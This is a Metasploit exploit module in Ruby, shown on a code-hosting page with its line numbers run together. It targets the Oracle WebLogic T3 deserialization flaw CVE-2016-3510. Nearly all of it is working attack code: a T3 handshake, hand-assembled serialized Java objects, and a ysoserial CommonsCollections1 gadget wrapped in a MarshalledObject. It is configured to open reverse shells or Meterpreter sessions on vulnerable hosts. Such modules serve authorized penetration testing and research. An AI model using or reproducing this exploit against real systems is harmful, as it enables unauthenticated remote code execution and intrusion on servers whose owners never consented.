Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Remote7Rank = ManualRanking89include Msf::Exploit::Remote::Tcp10include Msf::Exploit::JavaDeserialization1112def initialize(info={})13super(update_info(info,14'Name' => 'Oracle Weblogic Server Deserialization RCE - MarshalledObject',15'Description' => %q{16An unauthenticated attacker with network access to the Oracle Weblogic Server T317interface can send a serialized object (weblogic.corba.utils.MarshalledObject)18to the interface to execute code on vulnerable hosts.19},20'Author' =>21[22'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)23'Jacob Baines', # Vulnerability Discovery - Tenable Network Security24'Aaron Soto', # Reverse Engineering JSO and ysoserial blobs25'Steve Embling' # T3S support26],27'License' => MSF_LICENSE,28'References' =>29[30['CVE', '2016-3510']31],32'Privileged' => false,33'Platform' => %w{ unix win solaris },34'Targets' =>35[36[ 'Unix',37'Platform' => 'unix',38'Arch' => ARCH_CMD,39'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},40'Payload' => {41'Compat' => {'PayloadType' => 'cmd'}42}43],44[ 'Windows',45'Platform' => 'win',46'Payload' => {},47'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}48],49[ 'Solaris',50'Platform' => 'solaris',51'Arch' => ARCH_CMD,52'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},53'Payload' => {54'Space' => 2048,55'DisableNops' => true,56'Compat' =>57{58'PayloadType' => 'cmd',59'RequiredCmd' => 'generic perl telnet',60}61}62]63],64'DefaultTarget' => 0,65'DefaultOptions' => { 'WfsDelay' => 12 },66'DisclosureDate' => '2016-07-19',67'Notes' => {68'Reliability' => [REPEATABLE_SESSION],69'Stability' => [CRASH_SAFE],70'SideEffects' => [IOC_IN_LOGS]71}))7273register_options([74Opt::RPORT(7001),75])7677register_advanced_options([78OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])79])80end8182=begin This check is currently incompatible with the Tcp mixin. :-(83def check84resp = send_request_cgi(85'method' => 'GET',86'uri' => '/console/login/LoginForm.jsp'87)8889return CheckCode::Unknown unless resp && resp.code == 2009091unless resp.body.include?('Oracle WebLogic Server Administration Console')92vprint_warning("Oracle WebLogic Server banner cannot be found")93return CheckCode::Unknown94end9596/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body97unless version98vprint_warning("Oracle WebLogic Server version cannot be found")99return CheckCode::Unknown100end101102version = Rex::Version.new(version)103vprint_good("Detected Oracle WebLogic Server Version: #{version}")104case105when version.to_s.start_with?('10.3')106return CheckCode::Appears unless version > Rex::Version.new('10.3.6.0')107when version.to_s.start_with?('12.1.3')108return CheckCode::Appears unless version > Rex::Version.new('12.1.3.0')109when version.to_s.start_with?('12.2')110return CheckCode::Appears unless version > Rex::Version.new('12.2.1.0')111end112113return CheckCode::Safe114end115=end116117def t3_handshake118# retrieved from network traffic119if !datastore['SSL'] || datastore['FORCE_T3']120shake = 't3'121else122shake = 't3s'123end124shake << " 12.2.1\n"125shake << "AS:255\n"126shake << "HL:19\n"127shake << "MS:10000000\n\n"128129sock.put(shake)130sleep(1)131sock.get_once132end133134def build_t3_request_object135# T3 request serialized data136# retrieved by watching network traffic137# This is a proprietary, undocumented protocol138# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?139data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'140data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'141data << '700000000a000000030000000000000006007070707070700000000a00000003'142data << '0000000000000006007006'143144data << 'fe010000' # ----- separator -----145146data << 'aced0005' # JSO v5 header147data << '73' # object header148data << '72001d' # className (29 bytes):149data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry150data << '5461626c65456e747279' # (continued)151data << '2f52658157f4f9ed' # serialVersionUID152data << '0c00007870' # remainder of object header153data << '72' # object header154data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo155data << '65726e616c2e5061636b616765496e666f' # (continued)156data << 'e6f723e7b8ae1ec9' # serialVersionUID157data << '02' # SC_SERIALIZABLE158data << '0008' # fieldCount = 8159data << '4900056d616a6f72' # 0: Int: major160data << '4900056d696e6f72' # 1: Int: minor161data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch162data << '49000b736572766963655061636b' # 3: Int: servicePack163data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch164data << '4c0009696d706c5469746c65' # 5: Obj: implTitle165data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String166data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor167data << '71007e0003' # (Handle) 0x007e0003168data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion169data << '71007e0003' # (Handle) 0x007e0003170data << '78707702000078' # block footers171172data << 'fe010000' # ----- separator -----173174data << 'aced0005' # JSO v5 header175data << '7372' # object header176data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry177data << '735461626c65456e747279' # (continued)178data << '2f52658157f4f9ed' # serialVersionUID179data << '0c' # EXTERNALIZABLE | BLOCKDATA180data << '00007870' # remainder of object header181data << '72' # object header182data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo183data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)184data << '972245516452463e' # serialVersionUID185data << '02' # SC_SERIALIZABLE186data << '0003' # fieldCount = 3187data << '5b0008' # array header (8 bytes)188data << '7061636b61676573' # ARRAY NAME = 'packages'189data << '740027' # TC_STRING className1 (39 bytes)190data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo191data << '6e7465726e616c2f5061636b616765496e666f' # (continued)192data << '3b' # (continued)193data << '4c000e' # object header (14 bytes)194data << '72656c6561736556657273696f6e' # releaseVersion195data << '740012' # TC_STRING (18 bytes)196data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes197data << '5b0012' # array header (18 bytes)198data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;199data << '740002' # TC_STRING (2 bytes)200data << '5b42' # 0x5b42 = [B201data << '78' # block footer202203data << '720024' # class (36 bytes)204data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo205data << '7465726e616c2e5061636b616765496e666f' # (continued)206data << 'e6f723e7b8ae1ec9' # serialVersionUID207208data << '02' # SC_SERIALIZABLE209data << '0008' # fieldCount = 8210data << '4900056d616a6f72' # 0: Int: major211data << '4900056d696e6f72' # 1: Int: minor212data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch213data << '49000b736572766963655061636b' # 3: Int: servicePack214data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch215data << '4c0009696d706c5469746c65' # 5: Obj: implTitle216data << '71' # TC_REFERENCE217data << '007e0004' # Handle = 0x007e0004218data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor219data << '71' # TC_REFERENCE220data << '007e0004' # Handle = 0x007e0004221data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion222data << '71' # TC_REFERENCE223data << '007e0004' # Handle = 0x007e0004224data << '78' # class footer225data << '70' # TC_NULL226data << '77020000' # BLOCKDATA (2 bytes): 0x0000227data << '78' # block footer228229data << 'fe010000' # ----- separator -----230231data << 'aced0005' # JSO v5 header232data << '73' # object header233data << '72001d' # className (29 bytes):234data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry235data << '5461626c65456e747279' # (continued)236data << '2f52658157f4f9ed' # serialVersionUID237data << '0c00007870' # remainder of object header238data << '720021' # className (33 bytes)239data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo240data << '65726e616c2e50656572496e666f' # (continued)241data << '585474f39bc908f1' # serialVersionUID242data << '02' # SC_SERIALIZABLE243data << '0006' # fieldCount = 6244data << '4900056d616a6f72' # 0: Int: major245data << '4900056d696e6f72' # 1: Int: minor246data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch247data << '49000b736572766963655061636b' # 3: Int: servicePack248data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch249data << '5b00087061636b61676573' # 5: Array: packages250data << '740027' # TC_STRING (39 bytes)251data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;252data << '6e7465726e616c2f5061636b616765496e666f' # (continued)253data << '3b' # (continued)254data << '78' # block footer255data << '720024' # class (36 bytes)256data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Lweblogic/common/internal/PackageInfo;257data << '65726e616c2e56657273696f6e496e666f' # (continued)258data << '972245516452463e' # serialVersionUID259data << '02' # SC_SERIALIZABLE260data << '0003' # fieldCount = 3261data << '5b0008' # 0: Array262data << '7061636b6167657371' # packages263data << '007e0003' # Handle = 0x00730003264data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion265data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;266data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes267data << '740002' # TC_STRING (2 bytes)268data << '5b42' # VALUE = 0x5b42 = [B269data << '78' # block footer270data << '720024' # class: (36 bytes)271data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo272data << '6e616c2e5061636b616765496e666f' # (continued)273data << 'e6f723e7b8ae1ec9' # serialVersionUID274data << '02' # SC_SERIALIZABLE275data << '0008' # fieldCount = 8276data << '4900056d616a6f72' # 0: Int: major277data << '4900056d696e6f72' # 1: Int: minor278data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch279data << '49000b736572766963655061636b' # 3: Int: servicePack280data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch281data << '4c0009696d706c5469746c65' # 5: Obj: implTitle282data << '71' # TC_REFERENCE283data << '007e0005' # Handle = 0x007e0005284data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor285data << '71' # TC_REFERENCE286data << '007e0005' # Handle = 0x007e0005287data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion288data << '71' # TC_REFERENCE289data << '007e0005' # Handle = 0x007e0005290data << '78' # class footer291data << '707702000078' # block footers292293data << 'fe00ff' # this cruft again. some kind of footer294295data << 'fe010000' # ----- separator -----296297# weblogic.rjvm.JVMID object298data << 'aced0005' # JSO v5 header299data << '73' # object header300data << '720013' # class (19 bytes)301data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'302data << 'dc49c23ede121e2a' # serialVersionUID303data << '0c' # EXTERNALIZABLE | BLOCKDATA304data << '0000' # fieldCount = 0 (!!!)305data << '78' # block footer306data << '70' # NULL307data << '7750' # block header (80 bytes)308data << '21' # !309data << '000000000000000000' # 9 NULL BYTES310data << '0d' # \n311data << '3139322e3136382e312e323237' # 192.168.1.227312data << '00' # \0313data << '12' # #TODO: UNKNOWN314data << '57494e2d4147444d56515542315436' # WIN-AGDMVQUB1T6315data << '2e' # #TODO: UNKNOWN316data << '656883348cd6000000070000' # #TODO: UNKNOWN317data << rport.to_s(16).rjust(4, '0') # callback port318data << 'ffffffffffffffffffffffffffffffffffffff' # #TODO: UNKNOWN319data << 'ffffffffff' # #TODO: UNKNOWN320data << '78' # block footer321322data << 'fe010000' # ----- separator -----323324# weblogic.rjvm.JVMID object325data << 'aced0005' # JSO v5 header326data << '73' # object header327data << '72' # class328data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID329data << 'dc49c23ede121e2a' # serialVersionUID330data << '0c' # EXTERNALIZABLE | BLOCKDATA331data << '0000' # fieldCount = 0332data << '78' # end block333data << '70' # TC_NULL334data << '77' # block header335data << '20' # length = 32 bytes336data << '0114dc42bd071a772700' # #TODO: UNKNOWN337data << '0d' # \n338data << '3234322e3231342e312e323534' # 242.214.1.254339data << '61863d1d' # #TODO: UNKNOWN340data << '00000000' # NULL BYTES341data << '78' # block footer342343sock.put([data].pack('H*'))344sleep(1)345sock.get_once346end347348def send_payload_objdata349# basic weblogic ClassTableEntry object (serialized)350# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?351objdata = '056508000000010000001b0000005d0101007372017870737202787000000000'352objdata << '00000000757203787000000000787400087765626c6f67696375720478700000'353objdata << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'354355objdata << 'fe010000' # ----- separator -----356357objdata << 'aced0005' # JSO v5 header358objdata << '73' # object header359objdata << '72' # class360objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry361objdata << '73735461626c65456e747279' # (cont)362objdata << '2f52658157f4f9ed' # serialVersionUID363objdata << '0c' # EXTERNALIZABLE | BLOCKDATA364objdata << '0000' # fieldCount = 0365objdata << '7870' # remaining object header366objdata << '72' # class header367objdata << '00025b42' # Name: 0x5b42368objdata << 'acf317f8060854e0' # serialVersionUID369objdata << '02' # SERIALIZABLE370objdata << '0000' # fieldCount = 0371objdata << '7870' # class footer372objdata << '77' # block header373objdata << '020000' # contents = 0x0000374objdata << '78' # block footer375376objdata << 'fe010000' # ----- separator -----377378objdata << 'aced0005' # JSO v5 header379objdata << '73' # object header380objdata << '72' # class381objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry382objdata << '73735461626c65456e747279' # (cont)383objdata << '2f52658157f4f9ed' # serialVersionUID384objdata << '0c' # EXTERNALIZABLE | BLOCKDATA385objdata << '0000' # fieldCount = 0386objdata << '7870' # remaining object header387objdata << '72' # class header388389objdata << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;390objdata << '6563743b' # (cont)391objdata << '90ce589f1073296c' # serialVersionUID392objdata << '02' # SERIALIZABLE393objdata << '0000' # fieldCount = 0394objdata << '7870' # remaining object header395objdata << '77' # block header396objdata << '020000' # contents = 0x0000397objdata << '78' # block footer398399objdata << 'fe010000' # ----- separator -----400401objdata << 'aced0005' # JSO v5 header402objdata << '73' # object header403objdata << '72' # class404405objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry406objdata << '73735461626c65456e747279' # (cont)407objdata << '2f52658157f4f9ed' # serialVersionUID408objdata << '0c' # SERIALIZABLE | BLOCKDATA409objdata << '0000' # fieldCount = 0410objdata << '7870' # block footer411objdata << '72' # class header412objdata << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector413objdata << 'd9977d5b803baf01' # serialVersionUID414objdata << '03' # WRITE_METHOD | SERIALIZABLE415objdata << '0003' # fieldCount = 3416objdata << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement417objdata << '49000c656c656d656e74436f756e74' # 1: Int: elementCount418objdata << '5b000b656c656d656e7444617461' # 2: Array: elementData419objdata << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;420objdata << '743b' # (cont)421objdata << '7870' # remaining object header422objdata << '77' # block header423objdata << '020000' # contents = 0x0000424objdata << '78' # block footer425426objdata << 'fe010000' # ----- separator -----427428# payload generated from ysoserial and wrapped in a MarshalledObject:429objdata << 'aced0005' # JSO v5 header430objdata << '73' # object header431objdata << '72' # class header432433objdata << '00257765626c6f6769632e636f7262612e757469' # Name = weblogic.corba.utils.MarshalledObject434objdata << '6c732e4d61727368616c6c65644f626a656374' # (cont)435objdata << '592161d5f3d1dbb6' # serialVersionUID436objdata << '02' # SERIALIZABLE437objdata << '0002' # fieldCount = 2438objdata << '49000468617368' # 0: Int: hash439objdata << '5b00086f626a4279746573' # 1: Array: objBytes440objdata << '7400025b42' # Value: 0x5b42441objdata << '7870' # class footer442# class Data:443objdata << '21210fdc' # hash = 0x21210fdc (555814876d)444objdata << '757200025b42' # objBytes = [ 0x5b42 ]445objdata << 'acf317f8060854e0' # serialVersionUID446objdata << '02' # SERIALIZABLE447objdata << '0000' # fieldCount = 0448objdata << '7870' # class footer449objdata << '0000' # arraySize (first two bytes)450451# java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe452java_payload = generate_java_deserialization_for_payload('CommonsCollections1', payload)453objdata << (java_payload.length).to_s(16).rjust(4, '0')# arraySize (lower two bytes)454objdata << java_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join455456# basic weblogic ImmutableServiceContext object (serialized)457objdata << 'fe010000' # ----- separator -----458459objdata << 'aced0005' # JSO v5 header460objdata << '73' # object header461objdata << '72' # class462objdata << '00257765626c6f6769632e726a766d2e496d6d75' # Name = weblogic.rjvm.ImmutableServiceContext463objdata << '7461626c6553657276696365436f6e74657874' # (cont)464objdata << 'ddcba8706386f0ba' # serialVersionUID465objdata << '0c' # SERIALIZABLE | BLOCKDATA466objdata << '0000' # fieldCount = 0467objdata << '78' # remainder of object header468objdata << '72' # class header469objdata << '00297765626c6f6769632e726d692e70726f7669' # Name: weblogic.rmi.provider.BasicServiceContext470objdata << '6465722e426173696353657276696365436f6e74' # (cont)471objdata << '657874' # (cont)472objdata << 'e4632236c5d4a71e' # serialVersionUID473objdata << '0c' # SERIALIZABLE | BLOCKDATA474objdata << '0000' # fieldCount = 0475objdata << '78' # block footer476objdata << '70' # TC_NULL477objdata << '77' # block header478objdata << '020600' # Contents: 0x0600 (1536d) ### LENGTH OFFSET ADDED BELOW #TODO: WHY?479objdata << '73' # object header480objdata << '72' # class description481objdata << '00267765626c6f6769632e726d692e696e746572' # Name = weblogic.rmi.internal.MethodDescriptor482objdata << '6e616c2e4d6574686f6444657363726970746f72' # (cont)483objdata << '12485a828af7f67b' # serialVersionUID484objdata << '0c' # EXTERNALIZABLE | BLOCKDATA485objdata << '0000' # fieldCount = 0486objdata << '78' # block footer487objdata << '70' # TC_NULL488objdata << '77' # block header489objdata << '34002e61757468656e746963617465284c776562' # HEX-ASCII: authenticate(Lweblogic.security.acl.UserInfo;)490objdata << '6c6f6769632e73656375726974792e61636c2e55' # (cont)491objdata << '736572496e666f3b290000001b' # (cont)492objdata << '78' # block footer493objdata << '78' # object footer494495objdata << 'fe00ff' # this cruft again. some kind of footer496497# sets the length of the stream498data = ((objdata.length >> 1) + 4).to_s(16).rjust(8,'0')499data << objdata500501sock.put([data].pack('H*'))502sleep(1)503sock.get_once504end505506def exploit507connect508509print_status('Sending handshake...')510t3_handshake511512print_status('Sending T3 request object...')513build_t3_request_object514515print_status('Sending client object payload...')516send_payload_objdata517518handler519disconnect520end521end522523524